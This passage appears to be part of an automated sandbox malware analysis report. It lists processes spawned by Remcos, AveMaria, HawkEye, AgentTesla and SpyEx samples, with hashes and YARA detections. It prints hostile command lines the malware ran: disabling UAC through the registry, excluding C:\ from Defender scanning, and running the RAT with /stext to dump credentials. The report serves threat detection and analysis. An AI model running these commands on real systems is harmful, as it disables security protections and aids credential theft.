                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000000.681886689.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, Author: Joe Security
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:13:38:42
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                              Imagebase:0x11d0000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:38:43
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff724c50000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:38:43
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                              Imagebase:0x12b0000
                                                                                              File size:59392 bytes
                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:38:43
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell Add-MpPreference -ExclusionPath C:\
                                                                                              Imagebase:0xfa0000
                                                                                              File size:430592 bytes
                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:38:44
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\cmd.exe
                                                                                              Imagebase:0x11d0000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: AveMaria_WarZone, Description: unknown, Source: 00000009.00000002.931995653.0000000000690000.00000004.00000001.sdmp, Author: unknown
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:38:44
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff724c50000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:38:44
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff724c50000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:38:50
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                                                                                              Imagebase:0x220000
                                                                                              File size:147456 bytes
                                                                                              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:38:54
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.932016894.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000000.709586712.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.935198741.000000000064A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, Author: Joe Security
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:13:38:55
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Imagebase:0x11d0000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:38:56
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff724c50000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:13:38:56
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                              Imagebase:0x11d0000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:13:38:56
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000000.713254568.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.715029583.0000000000757000.00000004.00000020.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.714713917.0000000000454000.00000002.00020000.sdmp, Author: Joe Security

                                                                                              General

                                                                                              Start time:13:38:56
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff724c50000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:13:38:57
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                              Imagebase:0x12b0000
                                                                                              File size:59392 bytes
                                                                                              MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:13:39:01
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                                              Wow64 process (32bit):
                                                                                              Commandline:
                                                                                              Imagebase:
                                                                                              File size:30616 bytes
                                                                                              MD5 hash:0600DF60EF88FD10663EC84709E5E245
                                                                                              Has elevated privileges:
                                                                                              Has administrator privileges:
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:13:39:01
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                                              Wow64 process (32bit):
                                                                                              Commandline:
                                                                                              Imagebase:
                                                                                              File size:182784 bytes
                                                                                              MD5 hash:52A6CC99F5934CFAE88353C47B6193E7
                                                                                              Has elevated privileges:
                                                                                              Has administrator privileges:
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:13:39:02
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                                                              Wow64 process (32bit):
                                                                                              Commandline:
                                                                                              Imagebase:
                                                                                              File size:126464 bytes
                                                                                              MD5 hash:3A84A09CBC42148A0C7D00B3E82517F1
                                                                                              Has elevated privileges:
                                                                                              Has administrator privileges:
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:13:39:03
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\bin.exe"
                                                                                              Imagebase:0xd0000
                                                                                              File size:115712 bytes
                                                                                              MD5 hash:805FBB84293E86F25B566A5B2C2815D2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000002.730867358.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000001D.00000000.726336718.000000000021F000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000001D.00000000.726336718.000000000021F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000001D.00000002.730907039.000000000021F000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000001D.00000002.730907039.000000000021F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000000.726305427.00000000000E4000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000002.731576486.00000000034A2000.00000004.00000001.sdmp, Author: Joe Security

                                                                                              General

                                                                                              Start time:13:39:04
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jmtceghqeepjeivm"
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000000.728375820.0000000000454000.00000002.00020000.sdmp, Author: Joe Security

                                                                                              General

                                                                                              Start time:13:39:04
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\moyvwyrrsmhoowrqsha"
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000000.730677212.0000000000454000.00000002.00020000.sdmp, Author: Joe Security

                                                                                              General

                                                                                              Start time:13:39:07
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wilgxqclgvztqcfubsndyj"
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000000.740936585.0000000000454000.00000002.00020000.sdmp, Author: Joe Security

                                                                                              General

                                                                                              Start time:13:39:11
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000000.745207581.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.746741703.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.746856576.0000000000497000.00000004.00000020.sdmp, Author: Joe Security

                                                                                              General

                                                                                              Start time:13:39:12
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\dwn.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Remcos\dwn.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:2351104 bytes
                                                                                              MD5 hash:32EB10C12A29B38F13730CD1F5DCAD4D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Visual Basic
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                              General

                                                                                              Start time:13:39:19
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\21.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:900994 bytes
                                                                                              MD5 hash:6C9447A6F1B04C75D95594338AE61E06
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000024.00000002.796886573.0000000014770000.00000004.00000001.sdmp, Author: Joe Security

                                                                                              General

                                                                                              Start time:13:39:20
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\5.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:852277 bytes
                                                                                              MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                              General

                                                                                              Start time:13:39:22
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\4.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:586861 bytes
                                                                                              MD5 hash:78EDE0254C66FA9E667E4CEB88754E1C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000026.00000002.804765191.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000026.00000002.804765191.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                              General

                                                                                              Start time:13:39:27
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\21.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:900994 bytes
                                                                                              MD5 hash:6C9447A6F1B04C75D95594338AE61E06
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Visual Basic
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000002.930302567.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000000.789916886.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000000.785901828.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000000.791751960.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000000.787824676.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000001.793855505.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                                                              General

                                                                                              Start time:13:39:28
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\5.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:852277 bytes
                                                                                              MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, Author: Joe Security
